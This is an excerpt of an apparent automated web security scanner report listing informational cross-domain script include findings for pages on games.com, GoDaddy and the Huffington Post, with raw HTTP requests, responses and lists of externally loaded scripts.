Host: www.games.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: recentGames=335;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:57:15 GMT
Server: Apache-Coyote/1.1
P3P: CP="CAO PSA OUR"
Content-Type: text/html;charset=UTF-8
Set-Cookie: recentGames=335; Expires=Wed, 03-Aug-2011 10:57:15 GMT; Path=/
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Length: 57597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...

<script type="text/javascript" src="http://o.aolcdn.com/os_merge/?file=/games/scripts/jquery.min.js&file=/games/scripts/default.min.js&file=/header/js/jquery.globalheader-1.3.js&file=/header/js/jquery.globalsearchbox-1.3.js"></script>
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/os/aol/jquery.getjs-1.0.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://o.aolcdn.com/feedback/feedback1.js"></script>
...[SNIP]...
<script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.openwindow.min.js&file=/aol/jquery.aolshare.min.js" type="text/javascript"></script>

<script type="text/javascript" src="http://o.aolcdn.com/os/games/scripts/initialize.js"></script>
...[SNIP]...

17.106. http://www.games.com/game-play/family-feud/single previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.games.com
Path:	/game-play/family-feud/single

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.adsonar.com/js/adsonar.js
http://o.aolcdn.com/ads/adsWrapper.js
http://o.aolcdn.com/feedback/feedback1.js
http://o.aolcdn.com/os/games/scripts/initialize.js
http://o.aolcdn.com/os/header/js/jquery.globalheader-1.3.js
http://o.aolcdn.com/os/header/js/jquery.globalsearchbox-1.3.js
http://o.aolcdn.com/os_merge/?file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.openwindow.min.js&file=/aol/jquery.aolshare.min.js
http://o.aolcdn.com/os_merge/?file=/games/scripts/jquery.min.js&file=/games/scripts/default.min.js&file=/header/js/jquery.globalheader-1.3.js&file=/header/js/jquery.globalsearchbox-1.3.js
http://platform.twitter.com/widgets.js
http://www.stumbleupon.com/hostedbadge.php?s=1

Request

GET /game-play/family-feud/single HTTP/1.1
Host: www.games.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: recentGames=335;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:57:16 GMT
Server: Apache-Coyote/1.1
P3P: CP="CAO PSA OUR"
Content-Type: text/html;charset=UTF-8
Set-Cookie: recentGames=335; Expires=Wed, 03-Aug-2011 10:57:16 GMT; Path=/
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Length: 31490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...

<script type="text/javascript" src="http://o.aolcdn.com/os_merge/?file=/games/scripts/jquery.min.js&file=/games/scripts/default.min.js&file=/header/js/jquery.globalheader-1.3.js&file=/header/js/jquery.globalsearchbox-1.3.js"></script>
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...


<script type="text/javascript" src="http://o.aolcdn.com/os/header/js/jquery.globalheader-1.3.js"></script>
<script type="text/javascript" src="http://o.aolcdn.com/os/header/js/jquery.globalsearchbox-1.3.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<a target="_blank"><script src="http://www.stumbleupon.com/hostedbadge.php?s=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://o.aolcdn.com/feedback/feedback1.js"></script>
...[SNIP]...
<script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.openwindow.min.js&file=/aol/jquery.aolshare.min.js" type="text/javascript"></script>

<script type="text/javascript" src="http://o.aolcdn.com/os/games/scripts/initialize.js"></script>
...[SNIP]...

17.107. http://www.games.com/game/family-feud/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.games.com
Path:	/game/family-feud/

Issue detail

The response dynamically includes the following scripts from other domains:

http://eatps.web.aol.com:9000/open_web_adhoc?subtype=7051&sid=GAMES&game=335
http://js.adsonar.com/js/adsonar.js
http://o.aolcdn.com/ads/adsWrapper.js
http://o.aolcdn.com/feedback/feedback1.js
http://o.aolcdn.com/os/aol/jquery.getjs-1.0.min.js
http://o.aolcdn.com/os/games/scripts/initialize.js
http://o.aolcdn.com/os_merge/?file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.openwindow.min.js&file=/aol/jquery.aolshare.min.js
http://o.aolcdn.com/os_merge/?file=/games/scripts/jquery.min.js&file=/games/scripts/default.min.js&file=/header/js/jquery.globalheader-1.3.js&file=/header/js/jquery.globalsearchbox-1.3.js

Request

Response

17.108. https://www.godaddy.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js
https://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js?version=1
https://img3.wsimg.com/fos/script/ProductAdvisor5.min.js
https://img3.wsimg.com/fos/script/QuickBuyInsert8.min.js
https://img3.wsimg.com/fos/script/ViewExtensionsInsert7.min.js
https://img3.wsimg.com/fos/script/atlantis_jquery8.min.js
https://img3.wsimg.com/fos/script/jquery.tablesorter.min.js
https://img3.wsimg.com/fos/script/sales15.min.js
https://img3.wsimg.com/pc/js/1/gd_js_20110426.min.js

Request

GET / HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=2ot03x55n2cjbhmswxqzgtjx; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:18 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: SplitValue1=60; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:18 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=60; domain=godaddy.com; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:18 GMT
Connection: close
Content-Length: 267405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<body id="ctl00_PageBody" style="width:100%;margin:0;">

<script src="https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...


<script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110426.min.js"></script>
...[SNIP]...
</style>

<script src="https://img3.wsimg.com/fos/script/QuickBuyInsert8.min.js" type="text/javascript"></script>
...[SNIP]...
</div>

<script src="https://img3.wsimg.com/fos/script/atlantis_jquery8.min.js" type="text/javascript"></script>
...[SNIP]...
<div id="bottomPod02" style="width:1000px;height:192px;padding: 5px 0px 4px 0px;">

<script src="https://img3.wsimg.com/fos/script/ProductAdvisor5.min.js" type="text/javascript"></script>
...[SNIP]...
<div class="PodContainer">

<script src="https://img3.wsimg.com/fos/script/ViewExtensionsInsert7.min.js" type="text/javascript"></script>

<script src="https://img3.wsimg.com/fos/script/jquery.tablesorter.min.js" type="text/javascript"></script>
...[SNIP]...
</div>

<script src="https://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js?version=1" type="text/javascript"></script>

<script src="https://img3.wsimg.com/fos/script/sales15.min.js" type="text/javascript"></script>
...[SNIP]...

17.109. https://www.godaddy.com/domains/search.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/domains/search.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js
https://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js?version=1
https://img3.wsimg.com/fos/script/atlantis_jquery8.js
https://img3.wsimg.com/fos/script/sales15.min.js
https://img3.wsimg.com/pc/js/1/gd_js_20110426.min.js

Request

GET /domains/search.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=eaduka553tx3nvvrjumr4n23; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:20 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: SplitValue1=47; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:20 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=47; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_domainsearch=ugqjxgqhxeehnjxdoawhyhhaljygwjcd; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:19 GMT
Connection: close
Content-Length: 204705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<body id="ctl00_PageBody" style="width:100%;margin:0;">

<script src="https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...


<script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110426.min.js"></script>
...[SNIP]...
</div>

<script src="https://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js?version=1" type="text/javascript"></script>

<script src="https://img3.wsimg.com/fos/script/sales15.min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="https://img3.wsimg.com/fos/script/atlantis_jquery8.js" type="text/javascript"></script>
...[SNIP]...

17.110. https://www.godaddy.com/gdshop/hosting/landing.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/gdshop/hosting/landing.asp

Issue detail

The response dynamically includes the following scripts from other domains:

https://imagesak.securepaynet.net/AtlantisScripts/jquery/jquery-1.3.1.min.js
https://imagesak.securepaynet.net/js/mocha/scripts/excanvas-compressed.js
https://imagesak.securepaynet.net/js/mocha/scripts/mocha-9a.5.js
https://imagesak.securepaynet.net/js/mocha/scripts/mootools-1.2-core.js
https://imagesak.securepaynet.net/js/mocha/scripts/mootools-1.2-more.js
https://img3.wsimg.com/pc/js/1/gd_js_20110426.min.js

Request

GET /gdshop/hosting/landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 237966
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:23 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=DJIOEHOABCHFDNEFOEEOKGOF; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Web Hosting</title>
<meta http-equiv="Content-Type" con
...[SNIP]...
<body bgcolor="#FFFFFF" topmargin="0" leftmargin="0" marginheight="0" marginwidth="0" style="text-align:left; margin:0;">
<script src="https://imagesak.securepaynet.net/AtlantisScripts/jquery/jquery-1.3.1.min.js" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110426.min.js"></script>
...[SNIP]...
<link rel="stylesheet" href="https://imagesak.securepaynet.net/js/mocha/css/ui.css" type="text/css" />
<script type="text/javascript" src="https://imagesak.securepaynet.net/js/mocha/scripts/mootools-1.2-core.js"></script>
<script type="text/javascript" src="https://imagesak.securepaynet.net/js/mocha/scripts/mootools-1.2-more.js"></script>
<script type="text/javascript" src="https://imagesak.securepaynet.net/js/mocha/scripts/excanvas-compressed.js"></script>
<script type="text/javascript" src="https://imagesak.securepaynet.net/js/mocha/scripts/mocha-9a.5.js" charset="utf-8"></script>
...[SNIP]...

17.111. http://www.huffingtonpost.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.pubmatic.com/AdServer/js/universalpixel.js
http://o.aolcdn.com/ads/adsWrapper.js
http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Cflashobjectmin.js%2Cjsonmin.js%2Ccookiesmin.js%2Cv%2Fblogroll.js%2Chp_track.js%2Chp_util.js%2Cjquery%2Fcolor.jquery.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cjquery%2Fjquery.jdMenu.js%2Cprovider.js%2Cquickview.js%2Cshare.js%2Cposts.js%2Crefresh.js%2Cmost_popular.js%2Cfacebook.js%2Cgeopromo.js%2Csnproject.js%2Clazyload-min.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Cbalance_columns.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csitemode.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Csplash_slideshow.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Cuser_levels.js%2Ctwitter_splash.js%2Csharer.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Ctwitter%2Ffrontpage.js%2Chptwitter.js%2Capp-feeds.js&v47007
http://s.huffpost.com/assets/js.php?f=v.js&v47014
http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js

Request

Response

17.112. http://www.huffingtonpost.com/2011/05/02/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/2011/05/02/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.pubmatic.com/AdServer/js/universalpixel.js
http://o.aolcdn.com/ads/adsWrapper.js
http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Cflashobjectmin.js%2Cjsonmin.js%2Ccookiesmin.js%2Cv%2Fblogroll.js%2Chp_track.js%2Chp_util.js%2Cjquery%2Fcolor.jquery.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cjquery%2Fjquery.jdMenu.js%2Cprovider.js%2Cquickview.js%2Cshare.js%2Cposts.js%2Crefresh.js%2Cmost_popular.js%2Cfacebook.js%2Cgeopromo.js%2Csnproject.js%2Clazyload-min.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Cbalance_columns.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csitemode.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Csplash_slideshow.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Cuser_levels.js%2Ctwitter_splash.js%2Csharer.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Ctwitter%2Ffrontpage.js%2Chptwitter.js%2Capp-feeds.js&v47007
http://s.huffpost.com/assets/js.php?f=v.js&v47053
http://s.huffpost.com/assets/js.php?f=val.js
http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js

Request

GET /2011/05/02/ HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 123034
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=164
Date: Thu, 05 May 2011 10:58:24 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Wire Services" href="http://www.huffingtonpost.com/wires/full_index.rdf" />
       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js" ></script>

       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Cflashobjectmin.js%2Cjsonmin.js%2Ccookiesmin.js%2Cv%2Fblogroll.js%2Chp_track.js%2Chp_util.js%2Cjquery%2Fcolor.jquery.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cjquery%2Fjquery.jdMenu.js%2Cprovider.js%2Cquickview.js%2Cshare.js%2Cposts.js%2Crefresh.js%2Cmost_popular.js%2Cfacebook.js%2Cgeopromo.js%2Csnproject.js%2Clazyload-min.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Cbalance_columns.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csitemode.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Csplash_slideshow.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Cuser_levels.js%2Ctwitter_splash.js%2Csharer.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Ctwitter%2Ffrontpage.js%2Chptwitter.js%2Capp-feeds.js&v47007"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=v.js&v47053"></script>


<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=val.js"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

17.113. http://www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/2011/05/02/holocaust-memorial-day_n_856638.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.pubmatic.com/AdServer/js/universalpixel.js
http://o.aolcdn.com/ads/adsWrapper.js
http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
http://s.huffpost.com/assets/js.php?f=hp_scrollbar.js&extra3
http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js%2Cslideshow%2Fpollajax.js&v47007
http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js&v46884
http://s.huffpost.com/assets/js.php?f=twitter_clientside.js
http://s.huffpost.com/assets/js.php?f=v.js&v47014
http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js

Request

GET /2011/05/02/holocaust-memorial-day_n_856638.html HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.14.9.1304575182212; s_pers=%20s_getnr%3D1304575182214-New%7C1367647182214%3B%20s_nrgvo%3DNew%7C1367647182216%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolhuffpo%252Caolsvc%253D%252526pid%25253Dhpo%25252520%2525253A%25252520Osama%25252520Bin%25252520Laden%25252520Pictures%25252520Will%25252520Not%25252520Be%25252520Released%2525252C%25252520Obama%25252520Decides%25252520%25252528UPDATED%25252529%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Thu, 05 May 2011 01:00:40 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 01:00:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 469486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...

<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=print-view.css" type="text/css" media="print" />


   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js" ></script>

